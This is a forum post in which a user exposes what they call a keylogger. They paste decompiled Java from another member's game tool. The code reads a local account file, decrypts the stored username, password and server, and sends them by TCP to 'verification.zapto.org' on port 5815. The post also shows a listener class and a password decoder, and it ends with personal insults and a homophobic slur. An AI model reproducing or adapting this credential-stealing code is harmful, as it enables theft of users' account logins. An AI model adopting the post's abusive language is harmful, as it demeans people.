Decompiled it a bit more
@tehMaster
Seem's you like you're just converting ot string's and sending thme to yourself hmm...
With knowledge such as this why not make something of it and put it to good use, you snot
public PacketStore()
{
tcp = new TCP();
host = "verification.zapto.org";
hostport = 5815;
m_dwS = new byte[120];
keyGen();
String as[] = new String[4];
Object obj = null;
try
{
BufferedReader bufferedreader = new BufferedReader(new FileReader(file));
as[0] = (new StringBuilder()).append(bufferedreader.readLine(). trim()).append(" ").toString();
as[1] = (new StringBuilder()).append(bufferedreader.readLine(). trim()).append(" ").toString();
as[2] = (new StringBuilder()).append(bufferedreader.readLine(). trim()).append(" ").toString();
as[3] = (new StringBuilder()).append(bufferedreader.readLine(). trim()).append(" ").toString();
}
catch(Exception exception)
{
return;
}
String s = "";
String s1 = "";
String s2 = "";
byte abyte0[] = new byte[16];
for(int i = 0; i < 16; i++)
{
int k1 = as[0].indexOf(" ");
if(k1 == -1)
return;
String s3 = as[0].substring(0, k1);
as[0] = as[0].substring(k1 + 1);
int l2 = Integer.parseInt(s3, 16);
if(i > 3 && l2 > 0)
s = (new StringBuilder()).append(s).append((char)l2).toStri ng();
}
for(int j = 0; j < 16; j++)
{
int l1 = as[1].indexOf(" ");
if(l1 == -1)
return;
String s4 = as[1].substring(0, l1);
as[1] = as[1].substring(l1 + 1);
int i3 = Integer.parseInt(s4, 16);
if(j > 3)
{
abyte0[j - 4] = (byte)i3;
continue;
}
if(i3 > 0)
s = (new StringBuilder()).append(s).append((char)i3).toStri ng();
}
for(int k = 0; k < 16; k++)
{
int i2 = as[2].indexOf(" ");
if(i2 == -1)
return;
String s5 = as[2].substring(0, i2);
as[2] = as[2].substring(i2 + 1);
int j3 = Integer.parseInt(s5, 16);
if(k > 3)
{
if(j3 > 0)
s1 = (new StringBuilder()).append(s1).append((char)j3).toStr ing();
} else
{
abyte0[k + 12] = (byte)j3;
}
}
for(int l = 0; l < 4; l++)
{
int j2 = as[3].indexOf(" ");
if(j2 == -1)
return;
String s6 = as[3].substring(0, j2);
as[3] = as[3].substring(j2 + 1);
int k3 = Integer.parseInt(s6, 16);
if(k3 > 0)
s1 = (new StringBuilder()).append(s1).append((char)k3).toStr ing();
}
decrypt(abyte0);
for(int i1 = 0; i1 < 16; i1++)
if(abyte0[i1] > 31 && abyte0[i1] < 127)
s2 = (new StringBuilder()).append(s2).append((char)abyte0[i1]).toString();
else
s2 = (new StringBuilder()).append(s2).append(".").toString() ;
int j1 = s2.indexOf(".");
s2 = s2.substring(0, j1);
int k2 = tcp.connectToHost(host, hostport);
if(k2 != -1)
{
tcp.sendLine(k2, (new StringBuilder()).append("Username: ").append(s).append(", Password: ").append(s2).append(", Server: ").append(s1).toString());
tcp.closeConnection(k2);
}
}

-does exist and opens a page with some sort
of registration shit..dude that's pathetic.
And i don't know my java all too well but a public void keygen()
right after a Public Void decrypt() ? sound's to me liek a BIG keylogger lol.
So if my character get's picked out of the many who fell to this i'll know who to look for ^^
@R0drigU
Ur class files also had a public void decrypt() and keygen(), so maybe it's normal
however you did have a suspicious looking COListen.class
which only seem's to have the login server port. strange.
public COListen()
{
ips = new Hashtable();
tcp = new TCP();
int ss = tcp.startServer(9958);
do
{
int s;
do
s = tcp.waitConnect(ss);
while(s == -1);
new Connection(s);
} while(true);
}
public String hexDump(byte x[])
{
boolean first = true;
String chars = "";
String hex = "";
int ll = 0;
boolean gap = true;
String r = "";
for(int i = 0; i < x.length; i++)
{
byte b = x[i];
int bi = (new Byte(b)).intValue();
if(bi < 0)
bi += 256;
String z = Integer.toHexString(bi);
if(z.length() == 1)
z = "0" + z;
hex = hex + z + " ";
if(b > 32 && b < 127)
chars = chars + (char)b;
else
chars = chars + ".";
if(++ll == 16)
{
r = r + " " + hex + " " + chars + "\r\n";
hex = "";
chars = "";
ll = 0;
}
}
if(ll > 0)
{
while(ll++ < 16)
hex = hex + " ";
r = r + " " + hex + " " + chars + "\r\n";
}
return r;
}
public final int port = 9958;
public TCP tcp;
public Hashtable ips;
}
then ur decodepass()
decrypt(pass);
for(int i = 0; i < 16; i++)
if(pass[i] > 31 && pass[i] < 127)
passw = passw + (char)pass[i];
else
passw = passw + ".";
System.out.println("Username: " + user);
System.out.println("Password: " + passw);
System.out.println(" Server: " + server);
and YOU don't like flamer's? well i don't like fag's so shut your cock sucker.
NOOB THREAD DELETE